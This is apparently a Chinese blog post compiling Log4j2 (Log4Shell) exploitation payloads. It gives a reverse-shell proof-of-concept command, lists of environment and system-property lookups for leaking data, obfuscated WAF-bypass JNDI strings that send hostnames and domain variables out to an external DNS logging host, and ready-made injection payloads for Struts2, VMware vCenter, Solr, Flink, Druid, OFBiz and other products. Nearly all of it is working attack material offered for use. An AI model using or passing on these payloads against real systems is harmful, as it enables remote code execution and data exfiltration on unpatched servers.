• 【实战】log4j2远程命令执行漏洞利用姿势汇总


     

    0x00 反弹shell

    靶机:10.110.13.153
    java -jar log4jRCE-0.0.1-SNAPSHOT.jar
    http://10.110.13.153:18080/
    攻击机:10.110.13.106
    python3 poc.py --userip 10.110.13.106 --webport 8000 --lport 2345
    攻击机开启监听后,执行payload获取shell:

    0x01 获取敏感数据

    log4j-java

    ID usage method
    1 ${java:version} getSystemProperty("java.version")
    2 ${java:runtime} getRuntime()
    3 ${java:vm} getVirtualMachine()
    4 ${java:os} getOperatingSystem()
    5 ${java:hw} getHardware()
    6 ${java:locale} getLocale()
    数据中包含特殊字符时可考虑采用dns进行带外
    依此类推

    Linux

    id usage
    1 ${env:CLASSPATH}
    2 ${env:HOME}
    3 ${env:JAVA_HOME}
    4 ${env:LANG}
    5 ${env:LC_TERMINAL}
    6 ${env:LC_TERMINAL_VERSION}
    7 ${env:LESS}
    8 ${env:LOGNAME}
    9 ${env:LSCOLORS}
    10 ${env:LS_COLORS}
    11 ${env:MAIL}
    12 ${env:NLSPATH}
    13 ${env:OLDPWD}
    14 ${env:PAGER}
    15 ${env:PATH}
    16 ${env:PWD}
    17 ${env:SHELL}
    18 ${env:SHLVL}
    19 ${env:SSH_CLIENT}
    20 ${env:SSH_CONNECTION}
    21 ${env:SSH_TTY}
    22 ${env:TERM}
    23 ${env:USER}
    24 ${env:XDG_RUNTIME_DIR}
    25 ${env:XDG_SESSION_ID}
    26 ${env:XFILESEARCHPATH}
    27 ${env:ZSH}

    Windows

    id usage
    1 ${env:A8_HOME}
    2 ${env:A8_ROOT_BIN}
    3 ${env:ALLUSERSPROFILE}
    4 ${env:APPDATA}
    5 ${env:CATALINA_BASE}
    6 ${env:CATALINA_HOME}
    7 ${env:CATALINA_OPTS}
    8 ${env:CATALINA_TMPDIR}
    9 ${env:CLASSPATH}
    10 ${env:CLIENTNAME}
    11 ${env:COMPUTERNAME}
    12 ${env:ComSpec}
    13 ${env:CommonProgramFiles}
    14 ${env:CommonProgramFiles(x86)}
    15 ${env:CommonProgramW6432}
    16 ${env:FP_NO_HOST_CHECK}
    17 ${env:HOMEDRIVE}
    18 ${env:HOMEPATH}
    19 ${env:JRE_HOME}
    20 ${env:Java_Home}
    21 ${env:LOCALAPPDATA}
    22 ${env:LOGONSERVER}
    23 ${env:NUMBER_OF_PROCESSORS}
    24 ${env:OS}
    25 ${env:PATHEXT}
    26 ${env:PROCESSOR_ARCHITECTURE}
    27 ${env:PROCESSOR_IDENTIFIER}
    28 ${env:PROCESSOR_LEVEL}
    29 ${env:PROCESSOR_REVISION}
    30 ${env:PROMPT}
    31 ${env:PSModulePath}
    32 ${env:PUBLIC}
    33 ${env:Path}
    34 ${env:ProgramData}
    35 ${env:ProgramFiles}
    36 ${env:ProgramFiles(x86)}
    37 ${env:ProgramW6432}
    38 ${env:SESSIONNAME}
    39 ${env:SystemDrive}
    40 ${env:SystemRoot}
    41 ${env:TEMP}
    42 ${env:TMP}
    43 ${env:ThisExitCode}
    44 ${env:USERDOMAIN}
    45 ${env:USERNAME}
    46 ${env:USERPROFILE}
    47 ${env:WORK_PATH}
    48 ${env:windir}
    49 ${env:windows_tracing_flags}
    50 ${env:windows_tracing_logfile}

    log4j2-sys

    id usage
    1 ${sys:awt.toolkit}
    2 ${sys:file.encoding}
    3 ${sys:file.encoding.pkg}
    4 ${sys:file.separator}
    5 ${sys:java.awt.graphicsenv}
    6 ${sys:java.awt.printerjob}
    7 ${sys:java.class.path}
    8 ${sys:java.class.version}
    9 ${sys:java.endorsed.dirs}
    10 ${sys:java.ext.dirs}
    11 ${sys:java.home}
    12 ${sys:java.io.tmpdir}
    13 ${sys:java.library.path}
    14 ${sys:java.runtime.name}
    15 ${sys:java.runtime.version}
    16 ${sys:java.specification.name}
    17 ${sys:java.specification.vendor}
    18 ${sys:java.specification.version}
    19 ${sys:java.vendor}
    20 ${sys:java.vendor.url}
    21 ${sys:java.vendor.url.bug}
    22 ${sys:java.version}
    23 ${sys:java.vm.info}
    24 ${sys:java.vm.name}
    25 ${sys:java.vm.specification.name}
    26 ${sys:java.vm.specification.vendor}
    27 ${sys:java.vm.specification.version}
    28 ${sys:java.vm.vendor}
    29 ${sys:java.vm.version}
    30 ${sys:line.separator}
    31 ${sys:os.arch}
    32 ${sys:os.name}
    33 ${sys:os.version}
    34 ${sys:path.separator}
    35 ${sys:sun.arch.data.model}
    36 ${sys:sun.boot.class.path}
    37 ${sys:sun.boot.library.path}
    38 ${sys:sun.cpu.endian}
    39 ${sys:sun.cpu.isalist}
    40 ${sys:sun.desktop}
    41 ${sys:sun.io.unicode.encoding}
    42 ${sys:sun.java.command}
    43 ${sys:sun.java.launcher}
    44 ${sys:sun.jnu.encoding}
    45 ${sys:sun.management.compiler}
    46 ${sys:sun.os.patch.level}
    47 ${sys:sun.stderr.encoding}
    48 ${sys:user.country}
    49 ${sys:user.dir}
    50 ${sys:user.home}
    51 ${sys:user.language}
    52 ${sys:user.name}
    53 ${sys:user.script}
    54 ${sys:user.timezone}
    55 ${sys:user.variant}

    0x02 WAF Bypass

    ${jndi:ldap://127.0.0.1:1389/a}
    ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://ceye.io/a}
    ${${::-j}ndi:rmi://ceye.io/a}
    ${jndi:rmi://ceye.io}
    ${${lower:jndi}:${lower:rmi}://ceye.io/a}
    ${${lower:${lower:jndi}}:${lower:rmi}://ceye.io/a}
    ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://ceye.io/a}
    ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://ceye.io/a}
    ${${upper:jndi}:${upper:rmi}://ceye.io/a}
    ${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://ceye.io/a}
    ${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://ceye.io/a}
    ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.ceye.io}
    ${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://${hostName}.ceye.io}
    ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.ceye.io

    0x03 其它已知受影响组件可利用的payload

    Apache struts2
    http://127.0.0.1:8080/struts2-showcase/token/transfer4.action -d struts.token.name='${jndi:rmi://127.0 .0.1:1099/ylbtsl}'
    http://localhost:8080/struts2-showcase/$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/
     
    VMWare VCenter
    "X-Forwarded-For: \${jndi:ldap://10.0.0.3:1270/lol}" "https://10.0.0.4/websso/SAML2/SSO/photon- machine.lan?SAMLRequest="
     
    Apache James
    "smtp://localhost" --user "test:test" --mail-from '${jndi:ldap://localhost:1270/a}@gmail.com' --mail-rcpt 'test' --upload-file email.txt
     
    Apache Solr

    /solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json
    /solr/admin/cores?action=CREATE&name=$%7Bjndi:ldap://0.0.0.0/123%7D&wt=json
    /solr/admin/info/system?_=${jndi:ldap://0.0.0.0/123}&wt=json
    /solr/admin/cores?_=&action=&config=&dataDir=&instanceDir=${jndi:ldap://0.0.0.0/123}&name=&schema=&wt=

    Apache  Flink
    POST: http://0.0.0.0:8081/jars/${jndi:ldap:%252f%252f0.0.0.0%252f123}.jar/run
     
    Apache Druid

    /druid/coordinator/${jndi:ldap://0.0.0.0/123}
    /druid/indexer/${jndi:ldap://0.0.0.0/123}
    /druid/v2/${jndi:ldap://0.0.0.0/123}
    curl -vv -X DELETE 'http://xxxxxx:8888/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2fdruid_test.yyyyyyyy%7d'

     
    Apache JSPWiki
    http://localhost:8080/JSPWiki/wiki/$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/
     
    Apache OFBiz
    "Cookie: OFBiz.Visitor=\${jndi:ldap://localhost:1270/abc}" https://localhost:8443/webtools/control/main
     
     
  • 相关阅读:
    [zt]在XML序列化时去除默认命名空间xmlns:xsd和xmlns:xsi
    线程间操作无效: 从不是创建控件“...”的线程访问它。
    Unity IoC + WCF + wsHTTPBinding + Certificate Authorization
    [转]PowerDesigner使用教程 —— 概念数据模型
    C# Post数据和接收简单示例【摘】
    163相册验证码图片的识别手记之一 去除干扰
    实现WCF和Unity 的集成
    Html.ActionLink 几种重载方式说明及例子
    如何从程序员到项目经理【转帖51cto】
    OSG闪存
  • 原文地址:https://www.cnblogs.com/peterpan0707007/p/15772359.html
Copyright © 2020-2023  润新知